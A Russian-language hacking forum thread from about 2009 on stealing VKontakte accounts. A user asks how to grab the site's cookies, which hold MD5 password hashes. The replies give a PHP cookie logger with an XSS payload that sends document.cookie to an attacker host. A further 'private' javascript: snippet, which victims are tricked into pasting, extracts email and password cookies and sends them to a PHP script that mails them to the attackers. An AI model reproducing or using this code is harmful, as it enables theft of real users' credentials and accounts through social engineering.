terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » terminal-s52 » Хакинг » Взлом Вkontkte.ru

Взлом Вkontkte.ru

Страница: 1

Сообщений 1 страница 4 из 4

1

  • Автор: ByGreez
  • элита команды
  • ByGreez
  • Зарегистрирован: 2008-07-06
  • Приглашений: 0
  • Сообщений: 280
  • Уважение: [+12/-0]
  • Позитив: [+29/-0]
  • Пол: Мужской
  • Возраст: 31 [1992-08-27]
  • Провел на форуме:
    18 часов 10 минут
  • Последний визит:
    2010-12-24 02:07:17

Бродил как-то я по просторам www  наткнулся на то что сайт в контакте сохраняет хеш пароль пользователя в кукисах(md5)
Решил проверить... Поставил себе пасс который был уже расшифрован на hxxp://milw0rm.com/ ... и потом проверил куки и все совпало!
Теперь собственно вопрос:
   Как спереть куки из контакта???Типа удаленно..
Может как ніть через сніфер..?

Отредактировано ByGreez (2009-02-21 14:50:54)

0

2

  • Автор: xor eax, eax
  • Модератор
  • xor eax, eax
  • Зарегистрирован: 2008-06-18
  • Приглашений: 0
  • Сообщений: 356
  • Уважение: [+35/-4]
  • Позитив: [+39/-16]
  • Провел на форуме:
    2 дня 11 часов
  • Последний визит:
    2011-01-19 21:33:34

В паблике есть рара XSS на контакте...
погугли...
Затем кидаешь жертве линк с XSS с указанием снифера и ловишь пасс...
снифер:

льешь на хостинг скрипт:

Код:
<?php 
if(isset($_GET[1])){ 
$fp = fopen("log.html", "a+"); 
fwrite($fp, '<h1>'.date('H:i:s d F Y').'</h1>'."\r\n".'<textarea rows=40 cols=150>'.$_GET[1].'</textarea><br><br>' . "\r\n"); 
fclose($fp); 
} 
?>

затем создаеш файл log.html  и ставиш на него права 777

заюзать можно так:

Код:
 <script>var d=document; d.write('<img width=0 src=http://evilxakersait.com/i.php?1='+escape(d.cookie)+'>')</script>

Отредактировано bug1z (2009-02-21 18:59:09)

+1

3

  • Автор: ByGreez
  • элита команды
  • ByGreez
  • Зарегистрирован: 2008-07-06
  • Приглашений: 0
  • Сообщений: 280
  • Уважение: [+12/-0]
  • Позитив: [+29/-0]
  • Пол: Мужской
  • Возраст: 31 [1992-08-27]
  • Провел на форуме:
    18 часов 10 минут
  • Последний визит:
    2010-12-24 02:07:17

Красота)+1
Вот только с**а не работает( и хсс нету работающей (

Отредактировано ByGreez (2009-02-22 03:13:23)

0

4

  • Автор: KeipL
  • Красаффчег форума
  • KeipL
  • Зарегистрирован: 2007-12-24
  • Приглашений: 0
  • Сообщений: 256
  • Уважение: [+28/-0]
  • Позитив: [+10/-0]
  • Пол: Мужской
  • Провел на форуме:
    1 день 12 часов
  • Последний визит:
    2009-11-02 20:01:25

вот то чем пользуюсь я))) приват так сказать:
этот код впариваеш жертве - эго нужно вставить в адресную строку инажать энтер. (мол прикольный специфект)

Код:
javascript:var a = document.cookie; var temp = new Array(); s = a.substring(a.indexOf('remixemail')+11, a.indexOf('remixsid')-2); temp = s.split('; remixpass='); window.open('http://soldiers.site90.net/1.php?go='+temp[0]+'&url='+temp[1],'','toolbar=0, location=0,directories=0, menubar=0, scrollbars=0, resizable=0, width=1, height=1, left=1, top=1');

по адерсу http://soldiers.site90.net/1.php лежит файл с таким вот содержанием

Код:
<?php
$go = $_GET['go'];
$url = $_GET['url'];
$go=rawurldecode($go);
$url=rawurldecode($url);
$email="2keipl@gmail.com";
$email2="zakazvzlom@mail.ru";
$header="From: $go"; 
$subject="=?windows-1251?b?".base64_encode("We did it!")."?="; 
$msg="e-mail: $go || pass: $url"; 
mail($email, $subject, $msg, $header); 
mail($email2, $subject, $msg, $header); 

?>
<BODY onLoad="javascript:window.close();">

как видим скрипт создает ммааальное окошко в котором загружает странцу с параметрми куков вконтакте.ру, парсит их пхп скриптом и вуаля, мы любуемся парой мыло-пароль у себя в почтовом ящике. (окошко у жертвы закрывается сказу после выполнения скрипта)

Придумал сам.

Отредактировано KeipL (2009-03-25 14:06:18)

0

Страница: 1

Вы здесь » terminal-s52 » Хакинг » Взлом Вkontkte.ru